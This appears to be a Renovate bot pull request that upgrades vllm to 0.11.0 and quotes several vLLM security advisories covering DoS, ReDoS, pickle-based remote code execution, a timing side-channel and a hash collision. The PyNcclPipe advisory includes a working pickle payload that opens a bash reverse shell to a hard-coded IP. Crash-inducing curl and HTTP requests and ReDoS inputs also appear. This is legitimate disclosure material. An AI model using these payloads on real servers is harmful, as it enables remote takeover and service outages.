Skip to content

Conversation

renovate[bot]
Copy link
Contributor

@renovate renovate bot commented May 31, 2025

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
vllm ==v0.8.4 -> ==0.11.0 age adoption passing confidence
vllm ==v0.6.6 -> ==0.11.0 age adoption passing confidence
vllm ==v0.6.4 -> ==0.11.0 age adoption passing confidence
vllm ==0.8.4 -> ==0.11.0 age adoption passing confidence
vllm ==0.6.6 -> ==0.11.0 age adoption passing confidence
vllm ==0.6.4 -> ==0.11.0 age adoption passing confidence

phi4mm: Quadratic Time Complexity in Input Token Processing​ leads to denial of service

CVE-2025-46560 / GHSA-vc6m-hm49-g9qg

More information

Details

Summary

A critical performance vulnerability has been identified in the input preprocessing logic of the multimodal tokenizer. The code dynamically replaces placeholder tokens (e.g., <|audio_|>, <|image_|>) with repeated tokens based on precomputed lengths. Due to ​​inefficient list concatenation operations​​, the algorithm exhibits ​​quadratic time complexity (O(n²))​​, allowing malicious actors to trigger resource exhaustion via specially crafted inputs.

Details

​​Affected Component​​: input_processor_for_phi4mm function.
https://github.com/vllm-project/vllm/blob/8cac35ba435906fb7eb07e44fe1a8c26e8744f4e/vllm/model_executor/models/phi4mm.py#L1182-L1197

The code modifies the input_ids list in-place using input_ids = input_ids[:i] + tokens + input_ids[i+1:]. Each concatenation operation copies the entire list, leading to O(n) operations per replacement. For k placeholders expanding to m tokens, total time becomes O(kmn), approximating O(n²) in worst-case scenarios.

PoC

Test data demonstrates exponential time growth:

test_cases = [100, 200, 400, 800, 1600, 3200, 6400]
run_times = [0.002, 0.007, 0.028, 0.136, 0.616, 2.707, 11.854]  # seconds

Doubling input size increases runtime by ~4x (consistent with O(n²)).

Impact

​​Denial-of-Service (DoS):​​ An attacker could submit inputs with many placeholders (e.g., 10,000 <|audio_1|> tokens), causing CPU/memory exhaustion.
Example: 10,000 placeholders → ~100 million operations.

Remediation Recommendations​

Precompute all placeholder positions and expansion lengths upfront.
Replace dynamic list concatenation with a single preallocated array.

##### Pseudocode for O(n) solution
new_input_ids = []
for token in input_ids:
    if token is placeholder:
        new_input_ids.extend([token] * precomputed_length)
    else:
        new_input_ids.append(token)

Severity

  • CVSS Score: 6.5 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


vLLM Vulnerable to Remote Code Execution via Mooncake Integration

CVE-2025-32444 / GHSA-hj4w-hm2g-p6w5 / PYSEC-2025-42

More information

Details

Impacted Deployments

Note that vLLM instances that do NOT make use of the mooncake integration are NOT vulnerable.

Description

vLLM integration with mooncake is vaulnerable to remote code execution due to using pickle based serialization over unsecured ZeroMQ sockets. The vulnerable sockets were set to listen on all network interfaces, increasing the likelihood that an attacker is able to reach the vulnerable ZeroMQ sockets to carry out an attack.

This is a similar to GHSA - x3m8 - f7g5 - qhm7, the problem is in

https://github.com/vllm-project/vllm/blob/32b14baf8a1f7195ca09484de3008063569b43c5/vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py#L179

Here recv_pyobj() Contains implicit pickle.loads(), which leads to potential RCE.

Severity

  • CVSS Score: 10.0 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


vLLM Allows Remote Code Execution via PyNcclPipe Communication Service

CVE-2025-47277 / GHSA-hjq4-87xh-g4fv

More information

Details

Impacted Environments

This issue ONLY impacts environments using the PyNcclPipe KV cache transfer integration with the V0 engine. No other configurations are affected.

Summary

vLLM supports the use of the PyNcclPipe class to establish a peer-to-peer communication domain for data transmission between distributed nodes. The GPU-side KV-Cache transmission is implemented through the PyNcclCommunicator class, while CPU-side control message passing is handled via the send_obj and recv_obj methods on the CPU side.​

A remote code execution vulnerability exists in the PyNcclPipe service. Attackers can exploit this by sending malicious serialized data to gain server control privileges.

The intention was that this interface should only be exposed to a private network using the IP address specified by the --kv-ip CLI parameter. The vLLM documentation covers how this must be limited to a secured network: https://docs.vllm.ai/en/latest/deployment/security.html

Unfortunately, the default behavior from PyTorch is that the TCPStore interface will listen on ALL interfaces, regardless of what IP address is provided. The IP address given was only used as a client-side address to use. vLLM was fixed to use a workaround to force the TCPStore instance to bind its socket to a specified private interface.

This issue was reported privately to PyTorch and they determined that this behavior was intentional.

Details

The PyNcclPipe implementation contains a critical security flaw where it directly processes client-provided data using pickle.loads , creating an unsafe deserialization vulnerability that can lead to ​Remote Code Execution.

  1. Deploy a PyNcclPipe service configured to listen on port 18888 when launched:
from vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe import PyNcclPipe
from vllm.config import KVTransferConfig

config=KVTransferConfig(
    kv_ip="0.0.0.0",
    kv_port=18888,
    kv_rank=0,
    kv_parallel_size=1,
    kv_buffer_size=1024,
    kv_buffer_device="cpu"
)

p=PyNcclPipe(config=config,local_rank=0)
p.recv_tensor() # Receive data
  1. The attacker crafts malicious packets and sends them to the PyNcclPipe service:
from vllm.distributed.utils import StatelessProcessGroup

class Evil:
    def __reduce__(self):
        import os
        cmd='/bin/bash -c "bash -i >& /dev/tcp/172.28.176.1/8888 0>&1"'
        return (os.system,(cmd,))

client = StatelessProcessGroup.create(
    host='172.17.0.1',
    port=18888,
    rank=1,
    world_size=2,
)

client.send_obj(obj=Evil(),dst=0)

The call stack triggering ​RCE is as follows:

vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe.PyNcclPipe._recv_impl
	-> vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe.PyNcclPipe._recv_metadata
		-> vllm.distributed.utils.StatelessProcessGroup.recv_obj
			-> pickle.loads 

Getshell as follows:

image

Reporters

This issue was reported independently by three different parties:

  • @​kikayli (Zhuque Lab, Tencent)
  • @​omjeki
  • Russell Bryant (@​russellb)
Fix

Severity

  • CVSS Score: 9.8 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


CVE-2025-32444 / GHSA-hj4w-hm2g-p6w5 / PYSEC-2025-42

More information

Details

vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. Versions starting from 0.6.5 and prior to 0.8.5, having vLLM integration with mooncake, are vulnerable to remote code execution due to using pickle based serialization over unsecured ZeroMQ sockets. The vulnerable sockets were set to listen on all network interfaces, increasing the likelihood that an attacker is able to reach the vulnerable ZeroMQ sockets to carry out an attack. vLLM instances that do not make use of the mooncake integration are not vulnerable. This issue has been patched in version 0.8.5.

Severity

  • CVSS Score: 9.8 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References

This data is provided by OSV and the PyPI Advisory Database (CC-BY 4.0).


Data exposure via ZeroMQ on multi-node vLLM deployment

CVE-2025-30202 / GHSA-9f8f-2vmf-885j

More information

Details

Impact

In a multi-node vLLM deployment, vLLM uses ZeroMQ for some multi-node communication purposes. The primary vLLM host opens an XPUB ZeroMQ socket and binds it to ALL interfaces. While the socket is always opened for a multi-node deployment, it is only used when doing tensor parallelism across multiple hosts.

Any client with network access to this host can connect to this XPUB socket unless its port is blocked by a firewall. Once connected, these arbitrary clients will receive all of the same data broadcasted to all of the secondary vLLM hosts. This data is internal vLLM state information that is not useful to an attacker.

By potentially connecting to this socket many times and not reading data published to them, an attacker can also cause a denial of service by slowing down or potentially blocking the publisher.

Detailed Analysis

The XPUB socket in question is created here:

https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L236-L237

Data is published over this socket via MessageQueue.enqueue() which is called by MessageQueue.broadcast_object():

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/device_communicators/shm_broadcast.py#L452-L453

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/device_communicators/shm_broadcast.py#L475-L478

The MessageQueue.broadcast_object() method is called by the GroupCoordinator.broadcast_object() method in parallel_state.py:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L364-L366

The broadcast over ZeroMQ is only done if the GroupCoordinator was created with use_message_queue_broadcaster set to True:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L216-L219

The only case where GroupCoordinator is created with use_message_queue_broadcaster is the coordinator for the tensor parallelism group:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L931-L936

To determine what data is broadcasted to the tensor parallism group, we must continue tracing. GroupCoordinator.broadcast_object() is called by GroupCoordinator.broadcoast_tensor_dict():

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L489

which is called by broadcast_tensor_dict() in communication_op.py:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/communication_op.py#L29-L34

If we look at _get_driver_input_and_broadcast() in the V0 worker_base.py, we'll see how this tensor dict is formed:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/worker/worker_base.py#L332-L352

but the data actually sent over ZeroMQ is the metadata_list portion that is split from this tensor_dict. The tensor parts are sent via torch.distributed and only metadata about those tensors is sent via ZeroMQ.

https://github.com/vllm-project/vllm/blob/54a66e5fee4a1ea62f1e4c79a078b20668e408c6/vllm/distributed/parallel_state.py#L61-L83

Patches
Workarounds

Prior to the fix, your options include:

  1. Do not expose the vLLM host to a network where any untrusted connections may reach the host.
  2. Ensure that only the other vLLM hosts are able to connect to the TCP port used for the XPUB socket. Note that port used is random.
References

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


Remote Code Execution Vulnerability in vLLM Multi-Node Cluster Configuration

CVE-2025-30165 / GHSA-9pcc-gvx5-r5wm

More information

Details

Affected Environments

Note that this issue only affects the V0 engine, which has been off by default since v0.8.0. Further, the issue only applies to a deployment using tensor parallelism across multiple hosts, which we do not expect to be a common deployment pattern.

Since V0 is has been off by default since v0.8.0 and the fix is fairly invasive, we have decided not to fix this issue. Instead we recommend that users ensure their environment is on a secure network in case this pattern is in use.

The V1 engine is not affected by this issue.

Impact

In a multi-node vLLM deployment using the V0 engine, vLLM uses ZeroMQ for some multi-node communication purposes. The secondary vLLM hosts open a SUB ZeroMQ socket and connect to an XPUB socket on the primary vLLM host.

https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L295-L301

When data is received on this SUB socket, it is deserialized with pickle. This is unsafe, as it can be abused to execute code on a remote machine.

https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L468-L470

Since the vulnerability exists in a client that connects to the primary vLLM host, this vulnerability serves as an escalation point. If the primary vLLM host is compromised, this vulnerability could be used to compromise the rest of the hosts in the vLLM deployment.

Attackers could also use other means to exploit the vulnerability without requiring access to the primary vLLM host. One example would be the use of ARP cache poisoning to redirect traffic to a malicious endpoint used to deliver a payload with arbitrary code to execute on the target machine.

Severity

  • CVSS Score: 8.0 / 10 (High)
  • Vector String: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


CVE-2025-46570 / GHSA-4qjh-9fv9-r85r / PYSEC-2025-53

More information

Details

vLLM is an inference and serving engine for large language models (LLMs). Prior to version 0.9.0, when a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). These timing differences caused by matching chunks are significant enough to be recognized and exploited. This issue has been patched in version 0.9.0.

Severity

Unknown

References

This data is provided by OSV and the PyPI Advisory Database (CC-BY 4.0).


vLLM DOS: Remotely kill vllm over http with invalid JSON schema

CVE-2025-48942 / GHSA-6qc9-v4r8-22xg / PYSEC-2025-54

More information

Details

Summary

Hitting the /v1/completions API with a invalid json_schema as a Guided Param will kill the vllm server

Details

The following API call
(venv) [derekh@ip-172-31-15-108 ]$ curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}'
will provoke a Uncaught exceptions from xgrammer in
./lib64/python3.11/site-packages/xgrammar/compiler.py

Issue with more information: https://github.com/vllm-project/vllm/issues/17248

PoC

Make a call to vllm with invalid json_scema e.g. {\"properties\":{\"reason\":{\"type\": \"stsring\"}}}

curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}'

Impact

vllm crashes

example traceback

ERROR 03-26 17:25:01 [core.py:340] EngineCore hit an exception: Traceback (most recent call last):
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 333, in run_engine_core
ERROR 03-26 17:25:01 [core.py:340]     engine_core.run_busy_loop()
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 367, in run_busy_loop
ERROR 03-26 17:25:01 [core.py:340]     outputs = step_fn()
ERROR 03-26 17:25:01 [core.py:340]               ^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 181, in step
ERROR 03-26 17:25:01 [core.py:340]     scheduler_output = self.scheduler.schedule()
ERROR 03-26 17:25:01 [core.py:340]                        ^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/core/scheduler.py", line 257, in schedule
ERROR 03-26 17:25:01 [core.py:340]     if structured_output_req and structured_output_req.grammar:
ERROR 03-26 17:25:01 [core.py:340]                                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/structured_output/request.py", line 41, in grammar
ERROR 03-26 17:25:01 [core.py:340]     completed = self._check_grammar_completion()
ERROR 03-26 17:25:01 [core.py:340]                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/structured_output/request.py", line 29, in _check_grammar_completion
ERROR 03-26 17:25:01 [core.py:340]     self._grammar = self._grammar.result(timeout=0.0001)
ERROR 03-26 17:25:01 [core.py:340]                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/usr/lib64/python3.11/concurrent/futures/_base.py", line 456, in result
ERROR 03-26 17:25:01 [core.py:340]     return self.__get_result()
ERROR 03-26 17:25:01 [core.py:340]            ^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/usr/lib64/python3.11/concurrent/futures/_base.py", line 401, in __get_result
ERROR 03-26 17:25:01 [core.py:340]     raise self._exception
ERROR 03-26 17:25:01 [core.py:340]   File "/usr/lib64/python3.11/concurrent/futures/thread.py", line 58, in run
ERROR 03-26 17:25:01 [core.py:340]     result = self.fn(*self.args, **self.kwargs)
ERROR 03-26 17:25:01 [core.py:340]              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/structured_output/__init__.py", line 120, in _async_create_grammar
ERROR 03-26 17:25:01 [core.py:340]     ctx = self.compiler.compile_json_schema(grammar_spec,
ERROR 03-26 17:25:01 [core.py:340]           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/venv/lib64/python3.11/site-packages/xgrammar/compiler.py", line 101, in compile_json_schema
ERROR 03-26 17:25:01 [core.py:340]     self._handle.compile_json_schema(
ERROR 03-26 17:25:01 [core.py:340] RuntimeError: [17:25:01] /project/cpp/json_schema_converter.cc:795: Check failed: (schema.is<picojson::object>()) is false: Schema should be an object or bool
ERROR 03-26 17:25:01 [core.py:340] 
ERROR 03-26 17:25:01 [core.py:340] 
CRITICAL 03-26 17:25:01 [core_client.py:269] Got fatal signal from worker processes, shutting down. See stack trace above for root cause issue.
Fix

Severity

  • CVSS Score: 6.5 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


vLLM has a Regular Expression Denial of Service (ReDoS, Exponential Complexity) Vulnerability in pythonic_tool_parser.py

CVE-2025-48887 / GHSA-w6q7-j642-7c25 / PYSEC-2025-50

More information

Details

Summary

A Regular Expression Denial of Service (ReDoS) vulnerability exists in the file vllm/entrypoints/openai/tool_parsers/pythonic_tool_parser.py of the vLLM project. The root cause is the use of a highly complex and nested regular expression for tool call detection, which can be exploited by an attacker to cause severe performance degradation or make the service unavailable.

Details

The following regular expression is used to match tool/function call patterns:

r"\[([a-zA-Z]+\w*\(([a-zA-Z]+\w*=.*,\s*)*([a-zA-Z]+\w*=.*\s)?\),\s*)*([a-zA-Z]+\w*\(([a-zA-Z]+\w*=.*,\s*)*([a-zA-Z]+\w*=.*\s*)?\)\s*)+\]"

This pattern contains multiple nested quantifiers (*, +), optional groups, and inner repetitions which make it vulnerable to catastrophic backtracking.

Attack Example:
A malicious input such as

[A(A=	)A(A=,		)A(A=,		)A(A=,		)... (repeated dozens of times) ...]

or

"[A(A=" + "\t)A(A=,\t" * repeat

can cause the regular expression engine to consume CPU exponentially with the input length, effectively freezing or crashing the server (DoS).

Proof of Concept:
A Python script demonstrates that matching such a crafted string with the above regex results in exponential time complexity. Even moderate input lengths can bring the system to a halt.

Length: 22, Time: 0.0000 seconds, Match: False
Length: 38, Time: 0.0010 seconds, Match: False
Length: 54, Time: 0.0250 seconds, Match: False
Length: 70, Time: 0.5185 seconds, Match: False
Length: 86, Time: 13.2703 seconds, Match: False
Length: 102, Time: 319.0717 seconds, Match: False
Impact
  • Denial of Service (DoS): An attacker can trigger a denial of service by sending specially crafted payloads to any API or interface that invokes this regex, causing excessive CPU usage and making the vLLM service unavailable.
  • Resource Exhaustion and Memory Retention: As this regex is invoked during function call parsing, the matching process may hold on to significant CPU and memory resources for extended periods (due to catastrophic backtracking). In the context of vLLM, this also means that the associated KV cache (used for model inference and typically stored in GPU memory) is not released in a timely manner. This can lead to GPU memory exhaustion, degraded throughput, and service instability.
  • Potential for Broader System Instability: Resource exhaustion from stuck or slow requests may cascade into broader system instability or service downtime if not mitigated.
Fix

Severity

  • CVSS Score: 6.5 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


CVE-2025-48942 / GHSA-6qc9-v4r8-22xg / PYSEC-2025-54

More information

Details

vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, hitting the /v1/completions API with a invalid json_schema as a Guided Param kills the vllm server. This vulnerability is similar GHSA-9hcf-v7m4-6m2j/CVE-2025-48943, but for regex instead of a JSON schema. Version 0.9.0 fixes the issue.

Severity

Unknown

References

This data is provided by OSV and the PyPI Advisory Database (CC-BY 4.0).


CVE-2025-48943 / GHSA-9hcf-v7m4-6m2j / PYSEC-2025-55

More information

Details

vLLM is an inference and serving engine for large language models (LLMs). Version 0.8.0 up to but excluding 0.9.0 have a Denial of Service (ReDoS) that causes the vLLM server to crash if an invalid regex was provided while using structured output. This vulnerability is similar to GHSA-6qc9-v4r8-22xg/CVE-2025-48942, but for regex instead of a JSON schema. Version 0.9.0 fixes the issue.

Severity

Unknown

References

This data is provided by OSV and the PyPI Advisory Database (CC-BY 4.0).


vLLM vulnerable to Regular Expression Denial of Service

GHSA-j828-28rj-hfhp

More information

Details

Summary

A recent review identified several regular expressions in the vllm codebase that are susceptible to Regular Expression Denial of Service (ReDoS) attacks. These patterns, if fed with crafted or malicious input, may cause severe performance degradation due to catastrophic backtracking.

1. vllm/lora/utils.py Line 173

https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/lora/utils.py#L173
Risk Description:

  • The regex r"\((.*?)\)\$?$" matches content inside parentheses. If input such as ((((a|)+)+)+) is passed in, it can cause catastrophic backtracking, leading to a ReDoS vulnerability.
  • Using .*? (non-greedy match) inside group parentheses can be highly sensitive to input length and nesting complexity.

Remediation Suggestions:

  • Limit the input string length.
  • Use a non-recursive matching approach, or write a regex with stricter content constraints.
  • Consider using possessive quantifiers or atomic groups (not supported in Python yet), or split and process before regex matching.

2. vllm/entrypoints/openai/tool_parsers/phi4mini_tool_parser.py Line 52

https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/entrypoints/openai/tool_parsers/phi4mini_tool_parser.py#L52

Risk Description:

  • The regex r'functools\[(.*?)\]' uses .*? to match content inside brackets, together with re.DOTALL. If the input contains a large number of nested or crafted brackets, it can cause backtracking and ReDoS.

Remediation Suggestions:

  • Limit the length of model_output.
  • Use a stricter, non-greedy pattern (avoid matching across extraneous nesting).
  • Prefer re.finditer() and enforce a length constraint on each match.

3. vllm/entrypoints/openai/serving_chat.py Line 351

https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/entrypoints/openai/serving_chat.py#L351

Risk Description:

  • The regex r'.*"parameters":\s*(.*)' can trigger backtracking if current_text is very long and contains repeated structures.
  • Especially when processing strings from unknown sources, .* matching any content is high risk.

Remediation Suggestions:

  • Use a more specific pattern (e.g., via JSON parsing).
  • Impose limits on current_text length.
  • Avoid using .* to capture large blocks of text; prefer structured parsing when possible.

4. benchmarks/benchmark_serving_structured_output.py Line 650

https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/benchmarks/benchmark_serving_structured_output.py#L650

Risk Description:

  • The regex r'\{.*\}' is used to extract JSON inside curly braces. If the actual string is very long with unbalanced braces, it can cause backtracking, leading to a ReDoS vulnerability.
  • Although this is used for benchmark correctness checking, it should still handle abnormal inputs carefully.

Remediation Suggestions:

  • Limit the length of actual.
  • Prefer stepwise search for { and } or use a robust JSON extraction tool.
  • Recommend first locating the range with simple string search, then applying regex.
Fix

Severity

  • CVSS Score: 4.3 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


vLLM has a Weakness in MultiModalHasher Image Hashing Implementation

CVE-2025-46722 / GHSA-c65p-x677-fgj6 / PYSEC-2025-43

More information

Details

Summary

In the file vllm/multimodal/hasher.py, the MultiModalHasher class has a security and data integrity issue in its image hashing method. Currently, it serializes PIL.Image.Image objects using only obj.tobytes(), which returns only the raw pixel data, without including metadata such as the image’s shape (width, height, mode). As a result, two images of different sizes (e.g., 30x100 and 100x30) with the same pixel byte sequence could generate the same hash value. This may lead to hash collisions, incorrect cache hits, and even data leakage or security risks.

Details
  • Affected file: vllm/multimodal/hasher.py
  • Affected method: MultiModalHasher.serialize_item
    https://github.com/vllm-project/vllm/blob/9420a1fc30af1a632bbc2c66eb8668f3af41f026/vllm/multimodal/hasher.py#L34-L35
  • Current behavior: For Image.Image instances, only obj.tobytes() is used for hashing.
  • Problem description: obj.tobytes() does not include the image’s width, height, or mode metadata.
  • Impact: Two images with the same pixel byte sequence but different sizes could be regarded as the same image by the cache and hashing system, which may result in:
    • Incorrect cache hits, leading to abnormal responses
    • Deliberate construction of images with different meanings but the same hash value
Recommendation

In the serialize_item method, serialization of Image.Image objects should include not only pixel data, but also all critical metadata—such as dimensions (size), color mode (mode), format, and especially the info dictionary. The info dictionary is particularly important in palette-based images (e.g., mode 'P'), where the palette itself is stored in info. Ignoring info can result in hash collisions between visually distinct images with the same pixel bytes but different palettes or metadata. This can lead to incorrect cache hits or even data leakage.

Summary:
Serializing only the raw pixel data is insecure. Always include all image metadata (size, mode, format, info) in the hash calculation to prevent collisions, especially in cases like palette-based images.

Impact for other modalities
For the influence of other modalities, since the video modality is transformed into a multi-dimensional array containing the length, width, time, etc. of the video, the same problem exists due to the incorrect sequence of numpy as well.

For audio, since the momo function is not enabled in librosa.load, the loaded audio is automatically encoded into single channels by librosa and returns a one-dimensional array of numpy, thus keeping the structure of numpy fixed and not affected by this issue.

Fixes

Severity

  • CVSS Score: 4.2 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:L

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


Potential Timing Side-Channel Vulnerability in vLLM’s Chunk-Based Prefix Caching

CVE-2025-46570 / GHSA-4qjh-9fv9-r85r / PYSEC-2025-53

More information

Details

This issue arises from the prefix caching mechanism, which may expose the system to a timing side-channel attack.

Description

When a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). Our tests revealed that the timing differences caused by matching chunks are significant enough to be recognized and exploited.

For instance, if the victim has submitted a sensitive prompt or if a valuable system prompt has been cached, an attacker sharing the same backend could attempt to guess the victim's input. By measuring the TTFT based on prefix matches, the attacker could verify if their guess is correct, leading to potential leakage of private information.

Unlike token-by-token sharing mechanisms, vLLM’s chunk-based approach (PageAttention) processes tokens in larger units (chunks). In our tests, with chunk_size=2, the timing differences became noticeable enough to allow attackers to infer whether portions of their input match the victim's prompt at the chunk level.

Environment
  • GPU: NVIDIA A100 (40G)
  • CUDA: 11.8
  • PyTorch: 2.3.1
  • OS: Ubuntu 18.04
  • vLLM: v0.5.1
    Configuration: We launched vLLM using the default settings and adjusted chunk_size=2 to evaluate the TTFT.
Leakage

We conducted our tests using LLaMA2-70B-GPTQ on a single device. We analyzed the timing differences when prompts shared prefixes of 2 chunks, and plotted the corresponding ROC curves. Our results suggest that timing differences can be reliably used to distinguish prefix matches, demonstrating a potential side-channel vulnerability.
roc_curves_combined_block_2

Results

In our experiment, we analyzed the response time differences between cache hits and misses in vLLM's PageAttention mechanism. Using ROC curve analysis to assess the distinguishability of these timing differences, we observed the following results:

  • With a 1-token prefix, the ROC curve yielded an AUC value of 0.571, indicating that even with a short prefix, an attacker can reasonably distinguish between cache hits and misses based on response times.
  • When the prefix length increases to 8 tokens, the AUC value rises significantly to 0.99, showing that the attacker can almost perfectly identify cache hits with a longer prefix.
Fixes

Severity

  • CVSS Score: 2.6 / 10 (Low)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


vLLM Tool Schema allows DoS via Malformed pattern and type Fields

CVE-2025-48944 / GHSA-vrq3-r879-7m65

More information

Details

Summary

The vLLM backend used with the /v1/chat/completions OpenAPI endpoint fails to validate unexpected or malformed input in the "pattern" and "type" fields when the tools functionality is invoked. These inputs are not validated before being compiled or parsed, causing a crash of the inference worker with a single request. The worker will remain down until it is restarted.

Details

The "type" field is expected to be one of: "string", "number", "object", "boolean", "array", or "null". Supplying any other value will cause the worker to crash with the following error:

RuntimeError: [11:03:34] /project/cpp/json_schema_converter.cc:637: Unsupported type "something_or_nothing"

The "pattern" field undergoes Jinja2 rendering (I think) prior to being passed unsafely into the native regex compiler without validation or escaping. This allows malformed expressions to reach the underlying C++ regex engine, resulting in fatal errors.

For example, the following inputs will crash the worker:

Unclosed {, [, or (

Closed:{} and []

Here are some of runtime errors on the crash depending on what gets injected:

RuntimeError: [12:05:04] /project/cpp/regex_converter.cc:73: Regex parsing error at position 4: The parenthesis is not closed.
RuntimeError: [10:52:27] /project/cpp/regex_converter.cc:73: Regex parsing error at position 2: Invalid repetition count.
RuntimeError: [12:07:18] /project/cpp/regex_converter.cc:73: Regex parsing error at position 6: Two consecutive repetition modifiers are not allowed.

PoC

Here is the POST request using the type field to crash the worker. Note the type field is set to "something" rather than the expected types it is looking for:
POST /v1/chat/completions HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
Content-Type: application/json
Content-Length: 579
Origin:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive

{
"model": "mistral-nemo-instruct",
"messages": [{ "role": "user", "content": "crash via type" }],
"tools": [
{
"type": "function",
"function": {
"name": "crash01",
"parameters": {
"type": "object",
"properties": {
"a": {
"type": "something"
}
}
}
}
}
],
"tool_choice": {
"type": "function",
"function": {
"name": "crash01",
"arguments": { "a": "test" }
}
},
"stream": false,
"max_tokens": 1
}

